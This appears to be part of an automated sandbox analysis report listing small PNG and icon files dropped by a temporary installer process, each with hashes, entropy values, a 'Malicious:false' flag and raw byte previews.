                                                                                                                                                                                                                                                          SHA-512:C2CDCA46638E013B0196DA608FEC94846E006817852556BAD6702CC7A2798E93C3E6BC3678450C55C9C89590AF2BDE12C3032D449CCE7A3B5FF637987936000B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDAT8..R...p...U.....\..rvt.6-".c...am.....!q.j.sPJ.0..;....#..P......7T.....#.1l..G.wc.T}YB%F8.R........Yv.zu?..........].....ag.v..d.v.X..].0..l'....e..f..5.."}.....Za.. ,S|.......,t...p.d.{...]..u..U.D._....!9...q...W9].......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):4.007783593279535
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:w66666666666BOOOOOOOOOOSXOOOOOOOOOOSXOOO2OOOSXOeKLOSRMlSkHdOOOO9:w66666666666P3O66666666666/Ojk
                                                                                                                                                                                                                                                          MD5:887346B0A7F145675E44AB17E35F54FE
                                                                                                                                                                                                                                                          SHA1:C22531915DF0528177698EA3AD39DB9A70EA6869
                                                                                                                                                                                                                                                          SHA-256:BAC266365103ED4DDCA35A3B2398886E2090BBE53899DC809FA7DC9599654BC9
                                                                                                                                                                                                                                                          SHA-512:7EEC4DAE36617AE74FA8A916ED16746FD97BBC742C05BBA3250904660D1C8E87989D39BCEEAE405016A95F22BE937EBDB789A22E42CD1088F0ABF623916679B8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .........................................................................................................................................................U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6V..........................................................Z..V..........................................................Z..V..........................................................Z..V..........................................................Z..V......................p...q...q...p.......................Z..V..............t...s...................u...s...............Z..V......z...p...................................q...w.......Z..T..j...................................................k...W..V..........................................................Z..V..........................................................Z..U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6..........................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):284
                                                                                                                                                                                                                                                          Entropy (8bit):6.999082250525666
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPLzGx5AzGCL2yyI+9G1TWruJHixcusmPuAU/iCSS1zbuaVVp:6v/7DyeL2/Gor8HixWmkSEt7
                                                                                                                                                                                                                                                          MD5:08D991D399E657EA3A81DA798D204DD8
                                                                                                                                                                                                                                                          SHA1:8B8161A39DA344A96DCC40F8722D7C2BDAEE05D3
                                                                                                                                                                                                                                                          SHA-256:0DC9ECD2BB9B3A9E95D45B431B050CB3B32D7D1913CAEE21223193F6D6DFA4C2
                                                                                                                                                                                                                                                          SHA-512:C2CDCA46638E013B0196DA608FEC94846E006817852556BAD6702CC7A2798E93C3E6BC3678450C55C9C89590AF2BDE12C3032D449CCE7A3B5FF637987936000B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDAT8..R...p...U.....\..rvt.6-".c...am.....!q.j.sPJ.0..;....#..P......7T.....#.1l..G.wc.T}YB%F8.R........Yv.zu?..........].....ag.v..d.v.X..].0..l'....e..f..5.."}.....Za.. ,S|.......,t...p.d.{...]..u..U.D._....!9...q...W9].......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):5.463689107615048
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:K/1fhCeNZn1dIxF327RYl2gZArfrReA/T3UqZzqi:K/9hCAZn3EGRYvZMrReA7UMzqi
                                                                                                                                                                                                                                                          MD5:C4CE03C4D6D52FDA15ED85DD35661191
                                                                                                                                                                                                                                                          SHA1:7FC5453E63A2B3C8F5CC17A1A5B9D40E3BBCAA89
                                                                                                                                                                                                                                                          SHA-256:EA932489B1C366D47D33EF6FC4898A11E85C5EF5BA2982A21506FF49BD230B44
                                                                                                                                                                                                                                                          SHA-512:2A332EE917FDCEE81C4F1E19F340498B37AA1B549A1E48E5C5207879F5A6EC1233052A606202CE254E629EE63676BDAA1438D4165D0BF48C3CB4BCC3A26BC907
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ................................................................................................................H.H.#.#............................................b...4...+...X...y...'.'.!.!................................T...H...9...*.......~...r.r.'.'................................]...T...E...6...'..............&.&................................^...U...C...h..........5.5.-.-.%.%..................."..;..{....................I.I.<.<.4.4.,.,.#.#...............+..>..8.....w.........Z.Z.M.M.C.C.;.;.2.2.*.*..............3..N..J..j............k.k.\.\.M.M.B.B.9.9.1.1.#.#..........I..w..........}..u.....w...n.n.`.`.Q.Q.F.F.9.9...<.........._.............o..[........L^..Ci..4b..&Q...,...............f.............~..k........jj..QQ..<<..++...................k................w.........ii..ZZ..EE..33..&&...............Z.........................rr..``..LL..;;...................r...X..`...............yy.II
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):6.138741072579881
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:+qqGcDzDzzrspvYD/teTclAZOPUzydT4l7Rx6IRzav29P9B66k:a/DzDPrsK/tegAZOPAku7H5zav2d9B6Z
                                                                                                                                                                                                                                                          MD5:4BF5323641C8B9F667BE8A2530CB17C4
                                                                                                                                                                                                                                                          SHA1:8824036ED659C4D0A23376329B397BB01632B9DB
                                                                                                                                                                                                                                                          SHA-256:533DAA8DE562BB129564B41E2BBD734D74178E4CBB02B060A780A6C5DAE9D6B6
                                                                                                                                                                                                                                                          SHA-512:E63C20BF94A9DE5D6344E56A3D6934B32D65D13201BA3326E70F1DC0AFA9475ED2BFA44EB829498AB80265DC1B3B5ADB0BE866F50F685276E5B1FD0E0AFF73FA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ..........................q...y...x...x...x...x...w...x...x...x...w...x...x...x...x...r...|...s...s...s...s...s...s...r...s...t...s...s...s...s...s...{...~...v...v...w...w...v...v...v...u...u...v...v...v...w...v...|.......z....P..........z.............z...z............P..z...........}....X..........}.............}...}............W..}............!..^..........."............."...!..........]...!...........'..e...........'.............'...'..........d...'......."...-..k...........,.............-...J..........h...,...!...%...2..q...........2..............................K...3...%...)...7..w...........8...........................6...8...*.......=...7...)...)...>...0...*...0...7...@...=...9...>...=.......2...C..[...........B...C...C...D...C...D...C...C...C...C...3...8...I..p...........I...I...J...I...J...J...J...I...J...J...6...;...O...L..`...R...O...N...N...N...O...O...O...O...N...O...:...=..U...T..U..U...T...T..U..U..T...
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):284
                                                                                                                                                                                                                                                          Entropy (8bit):6.999082250525666
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPLzGx5AzGCL2yyI+9G1TWruJHixcusmPuAU/iCSS1zbuaVVp:6v/7DyeL2/Gor8HixWmkSEt7
                                                                                                                                                                                                                                                          MD5:08D991D399E657EA3A81DA798D204DD8
                                                                                                                                                                                                                                                          SHA1:8B8161A39DA344A96DCC40F8722D7C2BDAEE05D3
                                                                                                                                                                                                                                                          SHA-256:0DC9ECD2BB9B3A9E95D45B431B050CB3B32D7D1913CAEE21223193F6D6DFA4C2
                                                                                                                                                                                                                                                          SHA-512:C2CDCA46638E013B0196DA608FEC94846E006817852556BAD6702CC7A2798E93C3E6BC3678450C55C9C89590AF2BDE12C3032D449CCE7A3B5FF637987936000B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDAT8..R...p...U.....\..rvt.6-".c...am.....!q.j.sPJ.0..;....#..P......7T.....#.1l..G.wc.T}YB%F8.R........Yv.zu?..........].....ag.v..d.v.X..].0..l'....e..f..5.."}.....Za.. ,S|.......,t...p.d.{...]..u..U.D._....!9...q...W9].......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):284
                                                                                                                                                                                                                                                          Entropy (8bit):6.999082250525666
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPLzGx5AzGCL2yyI+9G1TWruJHixcusmPuAU/iCSS1zbuaVVp:6v/7DyeL2/Gor8HixWmkSEt7
                                                                                                                                                                                                                                                          MD5:08D991D399E657EA3A81DA798D204DD8
                                                                                                                                                                                                                                                          SHA1:8B8161A39DA344A96DCC40F8722D7C2BDAEE05D3
                                                                                                                                                                                                                                                          SHA-256:0DC9ECD2BB9B3A9E95D45B431B050CB3B32D7D1913CAEE21223193F6D6DFA4C2
                                                                                                                                                                                                                                                          SHA-512:C2CDCA46638E013B0196DA608FEC94846E006817852556BAD6702CC7A2798E93C3E6BC3678450C55C9C89590AF2BDE12C3032D449CCE7A3B5FF637987936000B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDAT8..R...p...U.....\..rvt.6-".c...am.....!q.j.sPJ.0..;....#..P......7T.....#.1l..G.wc.T}YB%F8.R........Yv.zu?..........].....ag.v..d.v.X..].0..l'....e..f..5.."}.....Za.. ,S|.......,t...p.d.{...]..u..U.D._....!9...q...W9].......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):639
                                                                                                                                                                                                                                                          Entropy (8bit):7.377780326372934
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7VDc+Qow9oS1rka1r1gslVtbq7eH8MycqGcjnM1eyYHhLpPiX:fLow9frbxG4qecMCBjnMsyYHiX
                                                                                                                                                                                                                                                          MD5:532021B5830C2239DEE3E8FF33229A0B
                                                                                                                                                                                                                                                          SHA1:4C2280EF8547087BE905669B6F49AEEA4C19E2F5
                                                                                                                                                                                                                                                          SHA-256:AA747B612FBFAC5FAC5866F83687D3683402387436E528C80D6E3B7C48EE770A
                                                                                                                                                                                                                                                          SHA-512:90D8345469986460A788254EDADCBFB13F5C0FFF81F8CD9707C86A47E1DBA426A6318E5BA52ACFC381F81DB59CF10B04A894EF7FC5CBC950CE5B59FD001C5F88
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a... cHRM..z%..............u0...`..:....o._.F....pHYs...........~.....tEXtSoftware.paint.net 4.0.6..c.....IDAT8O.SKH.Q...i..U...J..J.]......tS....E....]..BW...B...?(RE.D4.[.A. .Db2..../.....L..{....X..**...."."w9...e.;.FD.!.Z~8h.;fw.!..J....<1.5......n..L.... ..1.....U..o.........Q.....U.....G.Pg?...m....P[..[EdC..g|.~#.p.T.s...o/q1Z..B3..`...*.......C.K..X....Ym........aF...^.P....L.M..p2...Z..k.g....I....7...IC..P...:.Af.. ...-.P....am.3....~.k}H-.!9^.D.......Y[...?....{.w0W.k...O?...y....P+.5'....!........r..8..|.0N.....z7yD.X+.%..T....+..-..!-jG.o..kn.)61......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):4.007783593279535
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:w66666666666BOOOOOOOOOOSXOOOOOOOOOOSXOOO2OOOSXOeKLOSRMlSkHdOOOO9:w66666666666P3O66666666666/Ojk
                                                                                                                                                                                                                                                          MD5:887346B0A7F145675E44AB17E35F54FE
                                                                                                                                                                                                                                                          SHA1:C22531915DF0528177698EA3AD39DB9A70EA6869
                                                                                                                                                                                                                                                          SHA-256:BAC266365103ED4DDCA35A3B2398886E2090BBE53899DC809FA7DC9599654BC9
                                                                                                                                                                                                                                                          SHA-512:7EEC4DAE36617AE74FA8A916ED16746FD97BBC742C05BBA3250904660D1C8E87989D39BCEEAE405016A95F22BE937EBDB789A22E42CD1088F0ABF623916679B8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .........................................................................................................................................................U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6V..........................................................Z..V..........................................................Z..V..........................................................Z..V..........................................................Z..V......................p...q...q...p.......................Z..V..............t...s...................u...s...............Z..V......z...p...................................q...w.......Z..T..j...................................................k...W..V..........................................................Z..V..........................................................Z..U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6..........................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):3.490442714261337
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:hvTTTTTTTTTTTr6TTTTTTTTTTTTc2UTTATTTTTiTTFTTTTKTTTLTTUTTT5PTTVTp:NTTTTTTTTTTT2TTTTTTTTTTTTc2UTTAa
                                                                                                                                                                                                                                                          MD5:3EFC7DC297E404B3905700EC7BAD9F52
                                                                                                                                                                                                                                                          SHA1:51AA1918C57A97D0C0C60D7AE9C55356E6F6B8F9
                                                                                                                                                                                                                                                          SHA-256:455B953BE12AFA28BF8823BBD0A8E2C1D7730878FBCBF7B1D3245D4FB5A09ACA
                                                                                                                                                                                                                                                          SHA-512:29644DA8AB7596B0EF2849BF7BBED4B76478C38DCA6EE7E735D4CA9B4693F1978CF60A5909C8733A98CF5C14F088884FCFC0AED6C85C6109F7838729D18E98F9
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ................................................................................................................................................................B...{.....................................F.......d...........................................................d................................................................................................................................................................+,......................................................................$%..............................................................UU......................................................qq......................................................NO.........................................................................................................e...........................................................e.......G.......................................G..............................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):4.007783593279535
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:w66666666666BOOOOOOOOOOSXOOOOOOOOOOSXOOO2OOOSXOeKLOSRMlSkHdOOOO9:w66666666666P3O66666666666/Ojk
                                                                                                                                                                                                                                                          MD5:887346B0A7F145675E44AB17E35F54FE
                                                                                                                                                                                                                                                          SHA1:C22531915DF0528177698EA3AD39DB9A70EA6869
                                                                                                                                                                                                                                                          SHA-256:BAC266365103ED4DDCA35A3B2398886E2090BBE53899DC809FA7DC9599654BC9
                                                                                                                                                                                                                                                          SHA-512:7EEC4DAE36617AE74FA8A916ED16746FD97BBC742C05BBA3250904660D1C8E87989D39BCEEAE405016A95F22BE937EBDB789A22E42CD1088F0ABF623916679B8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .........................................................................................................................................................U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6V..........................................................Z..V..........................................................Z..V..........................................................Z..V..........................................................Z..V......................p...q...q...p.......................Z..V..............t...s...................u...s...............Z..V......z...p...................................q...w.......Z..T..j...................................................k...W..V..........................................................Z..V..........................................................Z..U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6..........................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):597
                                                                                                                                                                                                                                                          Entropy (8bit):7.503484841838105
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7w7/6TVuA6q45LsaGcUiSVgYtyHUzX8hXqY+sP5yuRGe0zwcu6S:X7/6xft45LqcUjGYUUzX8hXfPP0uiksS
                                                                                                                                                                                                                                                          MD5:535102101CF2549EAAC03D4D2424C607
                                                                                                                                                                                                                                                          SHA1:70BF44C6E737D6127182AB1D38840A448ED6A162
                                                                                                                                                                                                                                                          SHA-256:2E520CE5AAAF8A0DC35E182FE8986438B8CAB107221304AB4C9EAA901E1956AE
                                                                                                                                                                                                                                                          SHA-512:FA510429D278EDFC7576EC900B88A60D1E09B656CF558F16DBB1404137F372B89D67AD9B06EF6114D7353E4501486FEFD9284B888E53D29B8364604504C377D8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sBIT....|.d.....pHYs.................IDAT8..Mh.Q...{3.....&.*1..Zqg.i.A%.`.\...F.(....(.....q.E.e.mA..Z.XK..6.L3..ys]....Wzv..s..........yj.&[..t....U.0....;.|..[.....%..J.HbZ..T.......T.<BPJ..0p....1~[.OFgv...dLj..:D..'..Y...?t}ziMwx.@#..jj..S.c..<...o%s..M.t*bI...........5...w.Q2i...i%./...|..*s...u.j&.............k..9..r,.....p..9qW..bRi..W....}DC....T..E<|T0......0Ijx....\V.t...._..d.[....S.p(......>.....o.m...T[.pl[h..3.#..rE..v...wM..8[......h.,..G.~'...m?...5..V...e.b.=.7.!...D4....q)...*.%B.m?...o..#..9w1......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):4.007783593279535
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:w66666666666BOOOOOOOOOOSXOOOOOOOOOOSXOOO2OOOSXOeKLOSRMlSkHdOOOO9:w66666666666P3O66666666666/Ojk
                                                                                                                                                                                                                                                          MD5:887346B0A7F145675E44AB17E35F54FE
                                                                                                                                                                                                                                                          SHA1:C22531915DF0528177698EA3AD39DB9A70EA6869
                                                                                                                                                                                                                                                          SHA-256:BAC266365103ED4DDCA35A3B2398886E2090BBE53899DC809FA7DC9599654BC9
                                                                                                                                                                                                                                                          SHA-512:7EEC4DAE36617AE74FA8A916ED16746FD97BBC742C05BBA3250904660D1C8E87989D39BCEEAE405016A95F22BE937EBDB789A22E42CD1088F0ABF623916679B8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .........................................................................................................................................................U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6V..........................................................Z..V..........................................................Z..V..........................................................Z..V..........................................................Z..V......................p...q...q...p.......................Z..V..............t...s...................u...s...............Z..V......z...p...................................q...w.......Z..T..j...................................................k...W..V..........................................................Z..V..........................................................Z..U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6..........................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):3.5696063839477725
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:0onYbuFo5fA8aRoEttw4HX1Jur9OrnYGKBjD21cmex8ZJnISD:9loEttw8uWy9sYK
                                                                                                                                                                                                                                                          MD5:4F38A1E43DE6E4F1BD4BDBCC55706408
                                                                                                                                                                                                                                                          SHA1:BBBDFB099C1921BD944230FC37DC9963FD2EED81
                                                                                                                                                                                                                                                          SHA-256:9CA3C995F7DB760EFF9ED69DFDBA578481CAB520D164F1B7A1201E1DFB7AAA66
                                                                                                                                                                                                                                                          SHA-512:6840EAE20F876A5DE457AB3DC703E28D302FB640E641F9AC2117D8EF30DF447BCC265F3CDC68DA5EE21CF14AA0FFB7AD6873C041DF016DD536018E7BC9E59A90
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ........................................q...................................b.......................................!...............s...................................................................................................x...............................................................MJ...................g...8......................................*#...................................e..~........................................]......................"....................................S.......X...................... ....................................^...............................................i...........................K..........................?...n....................,......................y...J...........................J...................................................................................................................................4...........o..................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):485
                                                                                                                                                                                                                                                          Entropy (8bit):7.183161975210355
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7wM6ZjkLD81AWeAqr9XoQh35hBMjExRnj8OiD1i77sOw3N:XMfLDMe/4QFTyExl8Oihi8OIN
                                                                                                                                                                                                                                                          MD5:E09587AD1847CF4E2AD03524A3C1CA7D
                                                                                                                                                                                                                                                          SHA1:9564E6F66C74E3079F2DDA05A6A61742FB23683D
                                                                                                                                                                                                                                                          SHA-256:603A9A84F0E095585BD39B27CD4C4D194A4A45C664373D636E493C2841084957
                                                                                                                                                                                                                                                          SHA-512:5A00DB9331B1F1536C6152BF99F7245D159E46101122FA6827B0D5EF8D0377DB66DBB4CEAECA69F1AEC8FDDE51B506CB471B58A34E8A3DF09BAE0FC3F117CA2A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sBIT....|.d.....pHYs...........~.....tEXtSoftware.Adobe Fireworks CS4.......tEXtCreation Time.12/12/08.Z.....=IDAT8....J.P....DJ.V.hK!b...E.;8..../. 8._.'p..!...I.v.EQi. ...CZ..%..-.s...~.....cr....!."TjR...RY04M....!...s..i....'.r.j...../.>......(.g.....=...2....>~...89.Eq.....?.\.Z......C...cE...|.I.X.....(I...W.a..zj...O.:.?.........,.....PK...c...Y..5...B..k........jlmn@..S...qe]...z..p.1..\.E..|...d{{.......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):699
                                                                                                                                                                                                                                                          Entropy (8bit):7.652754071132357
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7WaWgISPVxzQYiM4U3qwAwJms1184FTquLwsObH6yk2CrJ61:rnuzKMf3pXmg/FDoZkd61
                                                                                                                                                                                                                                                          MD5:6A1DE861212D48E1899DF21E458C1542
                                                                                                                                                                                                                                                          SHA1:02A81BF8ADE97DAC769CD1DBA84A207431E077CF
                                                                                                                                                                                                                                                          SHA-256:052EE2A81A293DC611CE88300798DBA2B2E7B0CD924C099CB9B6B8C3D4B354D1
                                                                                                                                                                                                                                                          SHA-512:6EEC1E50166CBCB04C7A53AC7A94CC0133788FABC4E2B781F076B69DF3B906BDC07A4CB99CBF02F2E0B5F273DD3152DBDF2405BA78EDFD694034B7CA9545B458
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx.e.Kh.Q...;.I&.T..M.v..q.(.}(b[......"...V.Rm.......BD..ji...m......TteC...M2y\.....y....g.a..'..+.~.10.q.._0._.Yy..m>.d-.(.V..d`".6........u.w..).....|...$3Y.,;...%..H'.....iXWS.k.7!.....S"......ds.g..q`.{*Tx....l..D.]/..AV..[....5\...T......r.Kh#W..B...pi...\.CS...2..W^.*.a..:...(.;B..t4....J*..W+|.oc.7..B.%.........(.L...FDh.f.......EM.....8........+I.....C...n...._.?..../.....~t...q..6.....E.b..j...7#8M......p1.^.G.u.k.._.=E.cu.a.S7...E..[Q..h&.....E?.'0\..@....a.0."..M....m..c..........8.&.s.1.h .R.;.6..}w"8A.&......J..........`840w.#..3..X.V:y.>[.Y......J.3o..2Yn.5.esHC...;~.@.5.....K{.;`A.......".........IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):4.007783593279535
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:w66666666666BOOOOOOOOOOSXOOOOOOOOOOSXOOO2OOOSXOeKLOSRMlSkHdOOOO9:w66666666666P3O66666666666/Ojk
                                                                                                                                                                                                                                                          MD5:887346B0A7F145675E44AB17E35F54FE
                                                                                                                                                                                                                                                          SHA1:C22531915DF0528177698EA3AD39DB9A70EA6869
                                                                                                                                                                                                                                                          SHA-256:BAC266365103ED4DDCA35A3B2398886E2090BBE53899DC809FA7DC9599654BC9
                                                                                                                                                                                                                                                          SHA-512:7EEC4DAE36617AE74FA8A916ED16746FD97BBC742C05BBA3250904660D1C8E87989D39BCEEAE405016A95F22BE937EBDB789A22E42CD1088F0ABF623916679B8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .........................................................................................................................................................U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6V..........................................................Z..V..........................................................Z..V..........................................................Z..V..........................................................Z..V......................p...q...q...p.......................Z..V..............t...s...................u...s...............Z..V......z...p...................................q...w.......Z..T..j...................................................k...W..V..........................................................Z..V..........................................................Z..U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6..........................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):284
                                                                                                                                                                                                                                                          Entropy (8bit):6.999082250525666
